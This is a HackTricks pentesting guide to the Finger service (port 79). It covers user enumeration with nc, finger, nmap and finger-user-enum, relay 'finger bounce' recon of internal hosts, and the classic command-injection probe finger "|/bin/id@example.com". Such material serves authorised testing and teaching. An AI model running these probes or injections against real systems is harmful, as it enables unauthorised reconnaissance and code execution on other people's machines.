79 - Pentesting Finger

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Info

The Finger program/service is utilized for retrieving details about computer users. Typically, the information provided includes the user’s login name, full name, and, in some cases, additional details. These extra details could encompass the office location and phone number (if available), the time the user logged in, the period of inactivity (idle time), the last instance mail was read by the user, and the contents of the user’s plan and project files.

From a pentesting perspective, Finger is still interesting because the protocol is extremely small, human-readable, and often implemented with legacy parsing logic. A daemon may disclose:

  • currently logged-in users
  • full names / GECOS data
  • home directories, shells, last login times, and TTYs
  • .plan / .project contents
  • relay behaviour to query a second host through the first one

Default port: 79

PORT   STATE SERVICE
79/tcp open  finger

Enumeration

nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
printf '\r\n' | nc -vn <IP> 79         # Null query: ask for logged-in users
printf '/W root\r\n' | nc -vn <IP> 79  # Long format, if the daemon supports it

The protocol is ASCII over TCP/79, normally terminated with CRLF, and the server closes the TCP connection after the response. In practice a null query (\r\n) is often enough to retrieve the current user list, which is also what Nmap’s default finger NSE script does.

User enumeration

finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user
finger -l user@<Victim> #Long format from common UNIX clients

Alternatively you can use finger-user-enum from pentestmonkey, some examples:

finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
finger-user-enum.pl -U users.txt -t 10.0.0.2 -r 10.0.0.1

The important nuance with Finger enumeration is that there is no strict response format across daemons. Tools such as finger-user-enum work well against Solaris-style services because valid and invalid users produce different text layouts, but you may need to manually compare positive and negative replies and adapt the regexes if the target daemon is unusual.

Useful probes when the daemon is not behaving like stock Solaris/BSD:

# Null query: enumerate currently logged-in users
printf '\r\n' | nc -vn <IP> 79

# Long format
printf '/W\r\n' | nc -vn <IP> 79
printf '/W root\r\n' | nc -vn <IP> 79

# Spray several likely accounts in one go against permissive daemons
printf 'root admin oracle mysql ftp user test\r\n' | nc -vn <IP> 79

Nmap execute a script for doing using default scripts

nmap -sV -sC -p79 <IP>
nmap --script finger -p79 <IP>

Nmap’s finger NSE script is safe and simply sends a null query to recover the current user list. If you want broader username guessing against permissive daemons, consider extending the approach with custom wordlists or using projects such as fat-finger.nse, which send multiple likely account names in one request and look for username/GECOS matches.

Metasploit uses more tricks than Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Command execution

finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

RFC 1288 explicitly allows implementations to execute a user-controlled program in response to a Finger query, which is where the classic |/bin/... abuse comes from. This is rare today, but if you find a custom or legacy daemon, test carefully for:

  • shell metacharacters in username handling
  • |program execution in plan/project hooks
  • backend wrappers that pass the username to a shell script or CGI

Also remember the client-side abuse path on Windows: finger.exe is a signed LOLBIN that can retrieve arbitrary text from a remote Finger server on TCP/79, then pipe that output into another process. That technique is more relevant for post-exploitation than service enumeration, so see the Linux reverse-shell page for the shell transport idea and keep it in mind when emulating attacker tradecraft.

Finger Bounce

Use a system as a finger relay

finger user@host@victim
finger @internal@external

This isn’t just an implementation quirk: RFC 1288 defines recursive @hostname forwarding ({Q2} queries). If the daemon supports relaying, the intermediate server opens the second Finger connection for you and returns the response back over the original socket. That means:

  • your host may not connect directly to the final target
  • the relay can be used to enumerate internal users from an exposed Finger service
  • finger-user-enum supports this natively with -r <relay>

Example:

# Ask 10.0.0.1 to finger root on 10.0.0.2
printf 'root@10.0.0.2\r\n' | nc -vn 10.0.0.1 79

# Enumerate usernames on 10.0.0.2 through relay 10.0.0.1
finger-user-enum.pl -U users.txt -t 10.0.0.2 -r 10.0.0.1

If relaying works, use it as an internal recon primitive and compare the relayed output with the public daemon’s direct output. Different formatting or filtering often reveals whether the relay path is handled by a separate backend or wrapper.

References

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks